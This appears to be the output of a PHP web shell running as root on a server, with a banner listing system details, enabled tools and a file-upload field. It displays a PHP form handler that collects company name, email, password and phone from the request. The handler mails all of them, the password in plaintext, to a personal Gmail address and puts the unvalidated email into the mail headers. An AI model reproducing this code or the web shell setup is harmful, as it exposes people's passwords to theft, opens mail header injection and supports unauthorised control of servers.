| Server IP : 138.197.176.125 / Your IP : 216.73.217.122 Web Server : Apache/2.4.41 (Ubuntu) System : Linux SuiteCRM-8 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.3.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/jetcounter/ |
Upload File : |
<?php
// include "classes/class.phpmailer.php"; // include the class name
$company_name = $_REQUEST['company_name'];
$country = $_REQUEST['country'];
$username = $_REQUEST['email'];
$user_pass = $_REQUEST['password'];
$lang = $_REQUEST['lang'];
$phone = $_REQUEST['phone'];
$to="nitindhola.variance@gmail.com";
$msg = $msg."<br><br>From: ".$company_name."<br> Email: ".$username."<br>Password: ".$user_pass."<br>Country: ".$country."<br>Language: ".$lang."<br>Phone: ".$phone;
// Always set content-type when sending HTML email
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
// More headers
$headers .= "From: <".$username.">" . "\r\n";
mail($to,"Inquiry Mail",$msg,$headers);
header("location:http://saleshiker.com/thanks/");
?>